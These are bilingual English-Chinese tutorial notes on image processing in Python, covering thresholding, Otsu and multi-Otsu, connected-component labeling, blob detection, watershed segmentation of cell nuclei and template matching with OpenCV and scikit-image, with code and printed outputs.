    • Label connected regions of an integer array using measure.label

      • 使用measure.label标记整数数组中已连接的区域
    • Labels each connected entity as one object

      • 将每个连接的实体标记为一个对象
    • Connectivity = Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor.

      • 连通性 = 将像素 / 体素视为邻居的最大正交跳数。
• If None, full connectivity equal to input.ndim (the number of dimensions of the image) is used.

  • 如果为 None,则使用等于 input.ndim(图像的维数)的完全连通性。
• For a 2D image it would be 2.

  • 对于 2D 图像,它将是 2。
    label_image = measure.label(edge_touching_removed, connectivity=image.ndim)
    plt.imshow(label_image)
    <matplotlib.image.AxesImage at 0x20089c9dbb0>

    png

    • Return an RGB image where color-coded labels are painted over the image.

      • 返回一个RGB图像,其中颜色编码的标签涂在图像上。
    • Using label2rgb

    image_label_overlay = label2rgb(label_image, image=image)
    plt.imshow(image_label_overlay)
    <matplotlib.image.AxesImage at 0x20089d0a8e0>

    png

    #################################################
    # Calculate properties
    # Using regionprops or regionprops_table
    all_props = measure.regionprops(label_image, image)
    # Can print various parameters for all objects
for prop in all_props:
    print('Label: {} Area: {}'.format(prop.label, prop.area))
• Compute image properties and return them as a pandas-compatible table.

  • 计算图像属性并将它们作为与 pandas 兼容的表返回。
• Available regionprops: area, bbox, centroid, convex_area, coords, eccentricity, equivalent diameter, euler number, label, intensity image, major axis length, max intensity, mean intensity, moments, orientation, perimeter, solidity, and many more

  • 可用的区域属性:面积、包围盒(bbox)、质心、凸包面积、坐标、偏心率、等效直径、欧拉数、标签、强度图像、长轴长度、最大强度、平均强度、矩、方向、周长、实心度等等
props = measure.regionprops_table(label_image, image,
                                  properties=['label',
                                              'area', 'equivalent_diameter',
                                              'mean_intensity', 'solidity'])
    import pandas as pd
    df = pd.DataFrame(props)
    df.head()
    label area equivalent_diameter mean_intensity solidity
    0 1 1 1.128379 92.000000 1.000000
    1 2 587 27.338464 19.701874 0.956026
    2 3 1 1.128379 83.000000 1.000000
    3 4 40 7.136496 64.625000 0.701754
    4 5 1 1.128379 91.000000 1.000000
    # To delete small regions...
    df = df[df['area'] > 50]
    df.head()
    label area equivalent_diameter mean_intensity solidity
    1 2 587 27.338464 19.701874 0.956026
    8 9 366 21.587165 32.696721 0.963158
    11 12 226 16.963258 32.787611 0.945607
    15 16 71 9.507892 49.253521 0.934211
    16 17 220 16.736568 28.759091 0.897959

    Convert to micron scale

    df['area_sq_microns'] = df['area'] * (scale ** 2)
    df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (scale)
    df.head()
    label area equivalent_diameter mean_intensity solidity area_sq_microns equivalent_diameter_microns
    1 2 587 27.338464 19.701874 0.956026 211.32 16.403078
    8 9 366 21.587165 32.696721 0.963158 131.76 12.952299
    11 12 226 16.963258 32.787611 0.945607 81.36 10.177955
    15 16 71 9.507892 49.253521 0.934211 25.56 5.704735
    16 17 220 16.736568 28.759091 0.897959 79.20 10.041941
    df.to_csv('data/cast_iron_measurements.csv')

    Tutorial 56 - Blob Detector for segmentation based on feature properties -in python-

blob_百度百科 (baidu.com)

In computer vision, a blob is a connected region in an image. Blob analysis takes the binary image produced by foreground/background separation and extracts and labels its connected components; each labeled blob represents one foreground object, whose features can then be computed. The advantage is that blob extraction yields information about the regions of interest; the drawbacks are that it is relatively slow and the analysis can be difficult.

计算机视觉中的 Blob 是指图像中的一块连通区域,Blob 分析就是对前景/背景分离后的二值图像,进行连通域提取和标记。标记完成的每一个 Blob 都代表一个前景目标,然后就可以计算 Blob 的一些相关特征。其优点在于通过 Blob 提取,可以获得相关区域的信息,但是速度较慢,分析难度大。

    https://www.learnopencv.com/blob-detection-using-opencv-python-c/

    • BLOB stands for Binary Large OBject and refers to a group of connected pixels in a binary image.

      • BLOB代表二进制大对象,指的是二值图像中一组相互连接的像素。
• A Blob is a group of connected pixels in an image that share some common property (e.g. grayscale value).

      • Blob是一组在图像中具有某种共同属性(如灰度值)的相互连接的像素。
    • In the image above, the dark connected regions are blobs,
      and the goal of blob detection is to identify and mark these regions.

      • 在上图中,暗连接的区域是斑点,斑点检测的目标是识别和标记这些区域。

    How it works:

    • Threshold input images to binary.

      • 阈值输入图像为二值。
    • Grouping: connected white/black pixels are grouped together.

      • 分组:连接的白色/黑色像素分组在一起。
    • Merging: blobs located closer than minDistBetweenBlobs are merged.

      • 合并:位于比minDistBetweenBlobs更近的blobs被合并。
    • Center & Radius Calculation : The centers and radii of the new merged blobs are computed and returned.

      • 中心和半径计算:计算并返回新合并blobs的中心和半径。

    • Can be filtered by color, size or shape
      • 可以根据颜色、大小或形状过滤
    import matplotlib.pyplot as plt
    import numpy as np
    import cv2
    image = cv2.imread('images/cast_iron1.tif', 0)
• Set up the SimpleBlobDetector with default parameters.
      • 使用默认参数设置 SimpleBlobdetector。
    params = cv2.SimpleBlobDetector_Params()
    • Define thresholds
      • 定义阈值

    Can define thresholdStep. See documentation.

    params.minThreshold = 0
    params.maxThreshold = 255
    • Filter by Area.
      • 按面积过滤。
    params.filterByArea = True
    params.minArea = 50
    params.maxArea = 10000
    • Filter by Color (black=0)
      • 按颜色过滤
params.filterByColor = False  # Set to True for cast_iron, as we'll be detecting black regions
    params.blobColor = 0
    • Filter by Circularity
      • 圆度过滤器
    params.filterByCircularity = True
    params.minCircularity = 0.5
    params.maxCircularity = 1
    • Filter by Convexity
      • 通过凸性过滤器
    params.filterByConvexity = True
    params.minConvexity = 0.5
    params.maxConvexity = 1
    • Filter by InertiaRatio
      • 通过惯性系数过滤器
    params.filterByInertia = True
    params.minInertiaRatio = 0
    params.maxInertiaRatio = 1
    • Distance Between Blobs
      • Blobs 之间的距离
    params.minDistBetweenBlobs = 0
    • Setup the detector with parameters
      • 用参数设置探测器
    detector = cv2.SimpleBlobDetector_create(params)
    • Detect blobs
      • 检测 blobs
    keypoints = detector.detect(image)
    print("Number of blobs detected are : ", len(keypoints))
    Number of blobs detected are :  82
    • Draw blobs
      • 绘制 blobs
    img_with_blobs = cv2.drawKeypoints(image, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
    plt.imshow(img_with_blobs)
    <matplotlib.image.AxesImage at 0x2b46aa494f0>

    png

    Tutorial 57 - Nuclei -cell- segmentation in python using watershed

    What is watershed? 什么是分水岭?

    • Any grayscale image can be viewed as a topographic surface where high intensity denotes hills and low intensity denotes valleys.
      • 任何灰度图像都可以看作是一个地形表面,其中高强度表示丘陵,低强度表示山谷。

    png

• With watershed, we start filling every valley with differently colored water (labels).

  • 有了分水岭,我们开始用不同颜色的水(标签)填充每个山谷。
    • As the water rises, water from different valleys will start to merge.

      • 随着水位上升,来自不同山谷的水开始融合。
    • To avoid that, we build barriers in the locations where water merges.

      • 为了避免这种情况,我们在水汇合处建造了屏障。
    • Continue filling water and building barriers until all the peaks are under water.

      • 继续填水和建造屏障,直到所有的山峰都在水下。
    • The barriers will give us the segmentation result.

      • 屏障会给我们分割的结果。

    png

• To minimize over-segmentation due to noise in the image, OpenCV implemented a marker-based watershed algorithm.
  • 为了减少图像中噪声引起的过分割,OpenCV 实现了一种基于标记的分水岭算法。
    • We specify all valley points to be merged and also the ones not to be merged.
      • 我们指定所有要合并的谷点和不合并的谷点。
    • We first label the regions that we are sure of being the foreground (or object of interest) with one color.
      • 我们首先用一种颜色标记我们确定是前景(或感兴趣的对象)的区域。
    • Then label the regions that we are sure of being background or non-object with another color.
      • 然后用另一种颜色标记我们确定为背景或非物体的区域。
    • And, for unsure regions in between, label them with 0.
      • 对于中间的不确定区域,用 0 标记它们。
    • This process creates the marker.
      • 这个过程创建了标记。
    • Now apply watershed algorithm.
      • 现在应用分水岭算法。
    • The marker will be updated with the labels we provided, and the boundaries of objects will have a value of -1.
      • 标记将更新为我们提供的标签,对象的边界将有一个-1 的值。

    https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_imgproc/py_watershed/py_watershed.html


• This code performs cell counting and size distribution analysis and dumps results into a csv file.

  • 此代码执行细胞计数和大小分布分析,并将结果转储到 csv 文件中。
• It uses watershed segmentation to better separate touching nuclei.

  • 它使用分水岭分割来更好地分离相互接触的细胞核。
    import cv2
    import numpy as np
    from matplotlib import pyplot as plt
    from scipy import ndimage
    from skimage import measure, color, io
    img = cv2.imread('images/Osteosarcoma_01.tif')
    • Extract only blue channel as DAPI / nuclear (blue) staining is the best channel to perform cell count.

      • 只提取蓝色通道,因为DAPI /核(蓝色)染色是进行细胞计数的最佳通道。
• Blue channel. The image is equivalent to a grayscale image.

  • 蓝色通道。该图像相当于灰度图像。
    cells = img[:, :, 0]
    plt.imshow(cells, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b074850>

    png

    • 1 pixel = 454 nm (got this from the metadata of original image)

      • 1像素 = 454 nm(来自原始图像的元数据)
    pixels_to_um = 0.454

    STEP 1: Thresholded image for nuclei 核的阈值图像

• Threshold image to binary using OTSU. All thresholded pixels will be set to 255
  • 使用 OTSU 将图像阈值化为二值图像。所有超过阈值的像素将被设置为 255
    ret1, thresh = cv2.threshold(cells, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    plt.imshow(thresh, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b181f10>

    png

• Morphological operations to remove small noise - opening

  • 形态学开运算去除小噪声
• To remove holes we can use closing

  • 要去除孔洞,我们可以用闭运算
    kernel = np.ones((3,3),np.uint8)
    opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)

    from skimage.segmentation import clear_border
    opening = clear_border(opening) # Remove edge touching grains
    plt.imshow(opening, cmap='gray') # This is our image to be segmented further using watershed
    <matplotlib.image.AxesImage at 0x2b36bd0d6d0>

    png

    • Check the total regions found before and after applying this.
      • 检查应用此方法前后找到的区域总数。

STEP 2: Sure background

• Now we know that the regions at the centers of cells are surely cells

  • 现在我们知道细胞中心的区域肯定是细胞
    • The region far away is background.

      • 远处的区域是背景。
• We need to extract sure regions. For that, erode a few times.

  • 我们需要提取确定的区域。为此需要腐蚀几次。
• But we have cells touching, so erosion alone will not work.

  • 但细胞相互接触,所以单独腐蚀是不够的。
    • To separate touching objects, the best approach would be distance transform and then thresholding.

      • 要分离接触物体,最好的方法是先进行距离变换,再进行阈值分割。
• Let us start by identifying the sure background area: dilating the pixels a few times expands the cell boundaries into the background.

  • 让我们从确定背景区域开始:将像素膨胀几次,使细胞边界向背景扩展。
    • This way whatever is remaining for sure will be background.

      • 这样,任何可以确定的东西都将成为背景。
    • The area in between sure background and foreground is our ambiguous area.

      • 在确定的背景和前景之间的区域是我们的模糊区域。
    • Watershed should find this area for us.

      • 分水岭应该帮我们找到这片区域。
    sure_bg = cv2.dilate(opening,kernel,iterations=10)
    plt.imshow(sure_bg, cmap='gray') # Dark region is our sure background
    <matplotlib.image.AxesImage at 0x2b36c5b2ac0>

    png

• Finding the sure foreground area using distance transform and thresholding: the intensities of the points inside the foreground regions are changed to their respective distances from the closest 0 value (the boundary).

  • 利用距离变换和阈值分割寻找确定的前景区域:前景区域内各点的强度被替换为它们到最近的 0 值(边界)的距离。

    https://www.tutorialspoint.com/opencv/opencv_distance_transformation.htm

    dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
    plt.imshow(dist_transform, cmap='gray') # Dist transformed img.
    <matplotlib.image.AxesImage at 0x2b36bd55d00>

    png

    • Let us threshold the dist transform by starting at 1/2 its max value.

      • 让我们从dist变换的最大值的1/2开始阈值。
    print(dist_transform.max())  # gives about 21.9
    21.968996
    ret2, sure_fg = cv2.threshold(dist_transform,0.5*dist_transform.max(),255,0)
    plt.imshow(sure_fg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36bdc25e0>

    png

    STEP 3: Unknown

• Later you realize that 0.25 * max value will not separate the cells well.

  • 后来你会发现 0.25 * 最大值不能很好地分离细胞。
• A high value like 0.7 will not recognize some cells. 0.5 seems to be a good compromise.

  • 像 0.7 这样的高值将无法识别某些细胞。0.5 似乎是一个很好的折衷方案。
• The unknown, ambiguous region is nothing but background - foreground.

  • 未知的模糊区域不过是背景减去前景。
    sure_fg = np.uint8(sure_fg)  # Convert to uint8 from float
    unknown = cv2.subtract(sure_bg,sure_fg)
    plt.imshow(unknown, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36be24c10>

    png

    STEP 4: Markers

    • Now we create a marker and label the regions inside.

      • 现在我们创建一个标记,并标记里面的区域。
    • For sure regions, both foreground and background will be labeled with positive numbers.

      • 对于确定的区域,前景和背景都将被标记为正数。
    • Unknown regions will be labeled 0.

      • 未知区域将被标记为0。
    • For markers let us use ConnectedComponents.

      • 对于标记,让我们使用ConnectedComponents
    • Connected components labeling scans an image and groups its pixels into components based on pixel connectivity, i.e. all pixels in a connected component share similar pixel intensity values and are in some way connected with each other.

      • 连接组件标签扫描图像,并根据像素连接性将其像素分组,即连接组件中的所有像素共享相似的像素强度值,并以某种方式相互连接。
    • Once all groups have been determined, each pixel is labeled with a graylevel or a color (color labeling) according to the component it was assigned to.

      • 一旦确定了所有的组,每个像素将根据分配给它的组件用灰度或颜色(颜色标记)标记。
    ret3, markers = cv2.connectedComponents(sure_fg)
    plt.imshow(markers)
    <matplotlib.image.AxesImage at 0x2b36d8060a0>

    png

• One problem right now is that all background pixels are given the value 0.

  • 现在的一个问题是,所有背景像素的值都是 0。
    • This means watershed considers this region as unknown.

      • 这意味着watershed认为这个区域是未知的。
    • So let us add 10 to all labels so that sure background is not 0, but 10

      • 所以让我们给所有标签加上10,这样确定的背景不是0,而是10
    markers = markers + 10
    • Now, mark the region of unknown with zero
      • 现在,用零标记未知区域
    markers[unknown==255] = 0
    plt.imshow(markers, cmap='jet') # Look at the 3 distinct regions.
    <matplotlib.image.AxesImage at 0x2b36d8f51c0>

    png

• Now we are ready for watershed filling.

  • 现在我们已经准备好应用分水岭填充了。
    markers = cv2.watershed(img,markers)
    • Let us color boundaries in yellow.

      • 让我们用黄色标记边界。
    • Remember that watershed assigns boundaries a value of -1

      • 记住,分水岭的边界值是-1
    img[markers == -1] = [0,255,255]  
    • label2rgb - Return an RGB image where color-coded labels are painted over the image.
      • label2rgb -返回一个RGB图像,其中彩色编码的标签涂在图像上。
    img2 = color.label2rgb(markers, bg_label=0)
    plt.imshow(img2)
    <matplotlib.image.AxesImage at 0x2b36d9c4970>

    png

    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2b36da2de50>

    png

    • Now, time to extract properties of detected cells

      • 现在,是时候提取检测到的细胞的属性了
• Directly capturing props to a pandas dataframe

  • 直接将属性捕获到 pandas dataframe 中
props = measure.regionprops_table(markers, cells,
                                  properties=['label',
                                              'area', 'equivalent_diameter',
                                              'mean_intensity', 'solidity', 'orientation',
                                              'perimeter'])

    import pandas as pd
    df = pd.DataFrame(props)
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376
    • To delete small regions…
      • 删除较小区域…
    df = df[df['area'] > 50]
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376
    • Convert to micron scale
      • 转换成微米级
    df['area_sq_microns'] = df['area'] * (pixels_to_um ** 2)
    df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (pixels_to_um)
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter area_sq_microns equivalent_diameter_microns
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991 288629.799932 606.213556
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319 225.078672 16.928646
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465 235.384472 17.311869
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814 228.376528 17.052215
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376 344.213720 20.934816

    Tutorial 58 - Object detection using template matching

Template Matching 模板匹配

    OpenCV: Template Matching

    OBJECT DETECTION WITH TEMPLATES

    • Need a source image and a template image.

      • 需要一个源图像和一个模板图像。
• The template image T is slid over the source image (as in 2D convolution), and the program tries to find matches using statistics.

      • 模板图像T在源图像上滑动(在2D卷积中),程序尝试使用统计信息找到匹配。
    • Several comparison methods are implemented in OpenCV.

      • OpenCV中实现了几种比较方法。
• It returns a grayscale image, where each pixel denotes how well the neighbourhood of that pixel matches the template.

      • 它返回一个灰度图像,其中每个像素表示该像素的邻域与模板的匹配程度。
• Once you get the result, you can use the cv2.minMaxLoc() function to find where the maximum/minimum value is. Take it as the top-left corner of the rectangle and take (w,h) as the width and height of the rectangle.

      • 得到结果后,可以使用cv2.minMaxLoc()函数来查找最大值/最小值的位置。
        将其作为矩形的左上角,并将(w,h)作为矩形的宽和高。
    • That rectangle can be drawn on the region of matched template.

      • 该矩形可以绘制在匹配模板的区域上。

    • Template matching, single object in an image.

      • 模板匹配,图像中单个对象。
• Try multiple methods to see which one works best.

      • 多种方法,看看哪一种效果最好。
    import cv2
    import numpy as np
    import matplotlib.pyplot as plt
    img_rgb = cv2.imread('images/Ti_powder.tif')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263a924c550>

    png

    template = cv2.imread('images/Ti_powder_single.tif', 0)
    plt.imshow(template, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0a4be0>

    png

    h, w = template.shape[::]
    h, w
    (18, 16)
• For TM_SQDIFF, a good match yields the minimum value; a bad match yields large values

  • 对于 TM_SQDIFF,良好匹配产生最小值;不匹配会产生较大的值
• For all others it is exactly the opposite: max value = good fit.

  • 对于所有其他方法,情况正好相反:最大值 = 良好匹配。
    # methods available: ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
    # 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
    res = cv2.matchTemplate(img_gray, template, cv2.TM_SQDIFF)
    plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0ff8e0>

    png

    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
    min_val, max_val, min_loc, max_loc
    (4.0, 7702931.0, (318, 418), (66, 407))
# Change to max_loc for all except TM_SQDIFF
    # 将除 TM_SQDIFF 外的所有数据更改为 max_loc
    top_left = min_loc
    bottom_right = (top_left[0] + w, top_left[1] + h)

# Black rectangle with thickness 1.
# 绘制厚度为 1 的黑色矩形。
    cv2.rectangle(img_gray, top_left, bottom_right, 0, 1)

    plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae4de220>

    png
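To actually try the several comparison methods listed in the comment above, a small sketch (reusing img_gray and template from this section) can loop over them; the TM_SQDIFF variants locate the best match at the minimum, all others at the maximum:

methods = [('TM_CCOEFF', cv2.TM_CCOEFF), ('TM_CCOEFF_NORMED', cv2.TM_CCOEFF_NORMED),
           ('TM_CCORR', cv2.TM_CCORR), ('TM_CCORR_NORMED', cv2.TM_CCORR_NORMED),
           ('TM_SQDIFF', cv2.TM_SQDIFF), ('TM_SQDIFF_NORMED', cv2.TM_SQDIFF_NORMED)]
for name, method in methods:
    res = cv2.matchTemplate(img_gray, template, method)
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
    # SQDIFF methods: best match at the minimum; all others: at the maximum.
    if method in (cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED):
        top_left = min_loc
    else:
        top_left = max_loc
    print(name, "-> best match top-left corner:", top_left)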


    Template matching - multiple objects

• For multiple occurrences, cv2.minMaxLoc() won’t give all the locations

      • 对于多次出现,cv2.minMaxLoc()不会给出所有的位置
    • So we need to set a threshold

      • 所以我们需要设置一个阈值
    import cv2
    import numpy as np
    from matplotlib import pyplot as plt

    img_rgb = cv2.imread('images/Ti_powder.tif')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    template = cv2.imread('images/Ti_powder_single.tif',0)
    h, w = template.shape[::]

    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae67ac40>

    png

    # Pick only values above 0.8. For TM_CCOEFF_NORMED, larger values = good fit.
    # 只选择高于0.8的值。对于TM_CCOEFF_NORMED,较大的值=良好的拟合。
    threshold = 0.8

    loc = np.where( res >= threshold)
    # Outputs 2 arrays. Combine these arrays to get x,y coordinates - take x from one array and y from the other.
    # 输出2个数组。组合这些数组得到x,y坐标——从一个数组取x,从另一个数组取y。

# Reminder: the zip function returns an iterator of tuples, where the first items of each iterable are paired together, then the second items, then the third, etc.
# 提醒:zip 函数返回一个元组迭代器,其中每个可迭代对象的第一个项配对在一起,然后是第二个项,然后是第三个,等等。
    # 提醒:ZIP函数是一个元组迭代器,其中每个迭代器中的第一个项配对在一起,然后是第二个项,然后是第三个,等等。

for pt in zip(*loc[::-1]): # -1 to swap the values, since we assign x and y coordinates to draw the rectangle. -1 交换数值,以便按 x、y 坐标绘制矩形。
    # Draw a rectangle around each object. We know the top left (pt); draw the rectangle to match the size of the template image. 在每个物体周围画一个矩形。已知左上角(pt),按模板图像的大小绘制矩形。
    cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 1) # Red rectangles with thickness 1.
    plt.imshow(img_rgb)
    <matplotlib.image.AxesImage at 0x263a957fc10>

    png

    ]]>
    + 正文

    Tutorial 51 - What is image thresholding and segmentation

    What is image segmentation? 什么是图像分割?

And how is it different from thresholding? 它和阈值法有什么不同?

Image segmentation is the process of partitioning a digital image into multiple segments (image objects).

    • 图像分割是将一幅数字图像分割成多个段(图像对象)的过程。

Image thresholding is a simple form of image segmentation: it creates a binary image by applying a threshold value to the pixel intensities of the original image.

    • 图像阈值分割是图像分割的一种简单形式,它是在原始图像的像素强度上设置一个阈值的基础上创建一个二值图像的方法。

    png

    OpenCV —— 阈值分割(直方图技术法,熵算法,Otsu,自适应阈值算法)

    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread("images/Osteosarcoma_01.tif", 1)
    plt.imshow(img[:,:,::-1])
    <matplotlib.image.AxesImage at 0x15586e075e0>

    png

• Separate the blue channel, as it contains the nuclei pixels (DAPI).
  • 分开蓝色通道,因为它包含核像素(DAPI)。
    blue_channel = img[:,:,0]
    plt.imshow(blue_channel, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bc29a60>

    png

    plt.hist(blue_channel.flat, bins=100, range=(0, 120))
    (array([8.12033e+05, 3.47050e+04, 2.10950e+04, 3.48210e+04, 4.78370e+04,        1.07928e+05, 5.22380e+04, 4.82100e+04, 4.30030e+04, 3.66300e+04,        5.45780e+04, 2.04160e+04, 1.62930e+04, 1.28170e+04, 1.05070e+04,        1.52520e+04, 5.43100e+03, 4.38900e+03, 3.60500e+03, 2.90800e+03,        4.45800e+03, 1.71800e+03, 1.54000e+03, 1.34400e+03, 1.21900e+03,        2.06400e+03, 9.29000e+02, 8.15000e+02, 8.25000e+02, 7.36000e+02,        1.44100e+03, 6.95000e+02, 6.53000e+02, 6.37000e+02, 6.56000e+02,        1.30700e+03, 6.35000e+02, 6.70000e+02, 6.42000e+02, 6.53000e+02,        1.44100e+03, 7.63000e+02, 7.41000e+02, 8.87000e+02, 8.89000e+02,        1.84300e+03, 1.05800e+03, 1.03700e+03, 1.06800e+03, 1.09200e+03,        2.30900e+03, 1.16800e+03, 1.22000e+03, 1.28600e+03, 1.33500e+03,        2.73900e+03, 1.33800e+03, 1.43900e+03, 1.44000e+03, 1.51700e+03,        2.97600e+03, 1.54400e+03, 1.50600e+03, 1.54700e+03, 1.53600e+03,        3.21800e+03, 1.54400e+03, 1.64800e+03, 1.61200e+03, 1.61200e+03,        3.08900e+03, 1.53400e+03, 1.50400e+03, 1.53300e+03, 1.50700e+03,        2.88000e+03, 1.45900e+03, 1.38300e+03, 1.37400e+03, 1.38100e+03,        2.67000e+03, 1.33800e+03, 1.24400e+03, 1.22500e+03, 1.16200e+03,        2.38500e+03, 1.17100e+03, 1.13000e+03, 1.08200e+03, 1.04700e+03,        2.03100e+03, 1.03800e+03, 9.89000e+02, 9.92000e+02, 8.93000e+02,        1.78600e+03, 8.82000e+02, 7.94000e+02, 7.79000e+02, 1.52600e+03]), array([  0. ,   1.2,   2.4,   3.6,   4.8,   6. ,   7.2,   8.4,   9.6,         10.8,  12. ,  13.2,  14.4,  15.6,  16.8,  18. ,  19.2,  20.4,         21.6,  22.8,  24. ,  25.2,  26.4,  27.6,  28.8,  30. ,  31.2,         32.4,  33.6,  34.8,  36. ,  37.2,  38.4,  39.6,  40.8,  42. ,         43.2,  44.4,  45.6,  46.8,  48. ,  49.2,  50.4,  51.6,  52.8,         54. ,  55.2,  56.4,  57.6,  58.8,  60. ,  61.2,  62.4,  63.6,         64.8,  66. ,  67.2,  68.4,  69.6,  70.8,  72. ,  73.2,  74.4,         75.6,  76.8,  78. ,  79.2,  80.4,  81.6,  82.8,  84. ,  85.2,         86.4,  87.6,  88.8,  90. ,  91.2,  92.4,  93.6,  94.8,  96. ,         97.2,  98.4,  99.6, 100.8, 102. , 103.2, 104.4, 105.6, 106.8,        108. , 109.2, 110.4, 111.6, 112.8, 114. , 115.2, 116.4, 117.6,        118.8, 120. ]), <BarContainer object of 100 artists>)

    png

• Manual thresholding by applying a threshold value to the numpy array
  • 手动设置阈值
• After thresholding we will get a binary image.
  • 阈值化后得到二值图像。
    background = (blue_channel <= 40)
    nuclei = (blue_channel > 40)
    plt.imshow(nuclei, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bb277f0>

    png

    • Using opencv to perform manual threshold
      • 使用 opencv 执行手动阈值
    • All pixels above 40 will have pixel value 255
      • 所有高于 40 的像素的像素值都是 255
• Should be exactly the same as the above method.
  • 应该与上面的方法完全相同。
    ret1, thresh1 = cv2.threshold(blue_channel, 40, 255, cv2.THRESH_BINARY)
    ret1, thresh1
    (40.0, array([[255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))
    plt.imshow(thresh1, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c00133220>

    png

    AUTO using OTSU

    • Using opencv for otsu based automatic thresholding
      • 使用 opencv 进行基于 otsu 的自动阈值分割
• Reports a value of 50 as the threshold for the nuclei.
  • 报告值 50 作为细胞核的阈值。
    ret2, thresh2 = cv2.threshold(blue_channel, 0, 255, cv2.THRESH_BINARY +  cv2.THRESH_OTSU)
    ret2, thresh2
    (50.0, array([[255, 255,   0, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))
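The reference above also lists adaptive thresholding, which this tutorial does not demonstrate. As a minimal sketch (reusing blue_channel from above; the blockSize of 11 and constant C of 2 are illustrative assumptions, not from the tutorial), cv2.adaptiveThreshold computes a per-pixel threshold from each pixel's local neighbourhood, which can help when illumination is uneven:

# Adaptive thresholding (sketch): each pixel's threshold is the mean of its
# blockSize x blockSize neighbourhood minus the constant C, so uneven
# illumination is handled better than with a single global threshold.
adaptive = cv2.adaptiveThreshold(blue_channel, 255,
                                 cv2.ADAPTIVE_THRESH_MEAN_C,
                                 cv2.THRESH_BINARY, 11, 2)
plt.imshow(adaptive, cmap="gray")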

    numpy.digitize

• np.digitize needs bins to be defined as an array
  • np.digitize 需要将 bins 定义为数组
• So let us convert the threshold value to an array
  • 让我们将阈值转换为一个数组
• np.digitize assigns values 0, 1, 2, 3, … to pixels in each class.
  • np.digitize 将值 0,1,2,3,… 赋给每个类中的像素。
• For binary it would be 0 and 1.
  • 对于二值图像,它是 0 和 1。
    import numpy as np

    regions1 = np.digitize(blue_channel, bins=np.array([ret2]))
    plt.imshow(regions1)
    <matplotlib.image.AxesImage at 0x20c00a05ca0>

    png

Tutorial 52 - Auto-thresholding for multiple regions using multi-Otsu

    from matplotlib import pyplot as plt
    import numpy as np
    from skimage.filters import threshold_multiotsu
    import cv2
    img = cv2.imread("images/BSE.tif", 0)
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x163340e4e20>

    png

    # .flat returns the flattened numpy array (1D)
    plt.hist(img.flat, bins=100, range=(100, 255))
